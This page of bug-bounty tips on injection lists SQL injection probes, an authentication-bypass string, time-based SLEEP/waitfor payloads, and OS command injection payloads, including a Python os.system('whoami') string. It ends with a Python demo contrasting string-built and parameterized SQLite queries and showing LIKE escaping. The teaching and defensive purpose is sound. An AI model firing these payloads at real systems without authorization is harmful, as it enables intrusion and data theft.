Book of BugBounty Tips

Injection

  • #BugBountyTip did you know that the character '_' acts like the regex character '.' in SQL queries https://www.w3resource.com/sql/wildcards-like-operator/wildcards-underscore.php …

  • #bugbountytip It's possible to fire up "#OS #Command #Injection" instead of #XSS in Filename.PDF?parameter=PAYLOAD+|+Dir+c:\

  • #bugbountytips When you're trying to trigger a Command Injection flaw in #Python Web Application try to surround your payload with str() function i.e "%2bstr(__import.('os').system('whoami'))%2b"

  • Use Burp Intruder for Expression Language Injection and grep the response for 7744 :)

  • I found two SQL Injections tonight in private programs. One blind and the other hanging in plain sight. Here’s a tip. Wayback -> http://company.com -> grep | .php?id=

  • Give this a try while testing for SQLi Authentication Bypass :

    username: '--' / "--" password: '--' / "--"

  • Basic payload to test SQLi in Burp Repeater: '; waitfor delay '0:0:3' -- Check the time in the Response side if it delays the same as you change the seconds in the payload.

  • This is how I found sql-Injection 100% of the time For http://site.com/?q=HERE /?q=1 /?q=1' /?q=1" /?q=[1] /?q[]=1 /?q=1` /?q=1\ /?q=1/*'*/ /?q=1/*!1111'*/ /?q=1'||'asd'||' <== concat string /?q=1' or '1'='1 /?q=1 or 1=1 /?q='or''=' #bugbounty #BugBountyTips

  • SQLi Polyglot SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/ by @avlidienbrunn
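The tips above hinge on two things a defender can reproduce in a few lines: string-built SQL turns input such as `' or ''='` into query syntax, and a `_` in a LIKE pattern is a wildcard, not a literal. The following is an added example, not code from the book or from any of the quoted hunters. It uses Python's standard `sqlite3` module with a constructed in-memory `users` table and shows the vulnerable login query beside its parameterized form, plus LIKE-wildcard escaping for user-supplied search terms. All table and function names are assumptions for the demo.

```python
import sqlite3


def make_db():
    """Constructed sample data (not from the page). Plaintext passwords are used only
    to keep the demo short; a real system compares password hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("alice", "s3cret"), ("a_ice", "hunter2"), ("bob", "pa55")],
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """The anti-pattern: input is interpolated into the statement text, so quotes,
    comment markers and OR clauses supplied by the user become part of the query."""
    sql = (
        f"SELECT id FROM users WHERE username = '{username}' "
        f"AND password = '{password}'"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """The fix: bound parameters. The driver passes values separately from the
    statement, so the same input is compared as data and never parsed as SQL."""
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def escape_like(term, esc="\\"):
    """Escape LIKE metacharacters (% and _) and the escape character itself so a
    search for 'a_ice' matches only that literal string, not 'alice' as well."""
    return (
        term.replace(esc, esc + esc)
        .replace("%", esc + "%")
        .replace("_", esc + "_")
    )


def search_users(conn, term, escape_wildcards=True):
    """Parameterized LIKE search. Binding the value stops injection, but the
    wildcard semantics of % and _ survive unless the term is escaped too."""
    pattern = escape_like(term) if escape_wildcards else term
    rows = conn.execute(
        "SELECT username FROM users WHERE username LIKE ? ESCAPE '\\'", (pattern,)
    ).fetchall()
    return [r[0] for r in rows]


def demo():
    """Run both login variants with the tautology payload quoted on the page and
    both search variants with a term containing an underscore."""
    conn = make_db()
    injected = "' or ''='"  # payload taken from the tips above
    return {
        "vuln_login": login_vulnerable(conn, injected, injected),   # 1: alice, no password known
        "safe_login": login_safe(conn, injected, injected),         # None: treated as data
        "safe_login_real": login_safe(conn, "alice", "s3cret"),     # 1: legitimate login
        "search_raw": search_users(conn, "a_ice", escape_wildcards=False),  # ['alice', 'a_ice']
        "search_escaped": search_users(conn, "a_ice"),              # ['a_ice']
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The search half is the point often missed after a parameterization sweep: binding the value closes the injection, but a `_` or `%` in the bound value still acts as a wildcard, which is what the first tip is describing. Escaping the term and declaring the escape character in the `ESCAPE` clause is the fix; the same escaping applies to MySQL and PostgreSQL LIKE queries.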

Last updated 2 months ago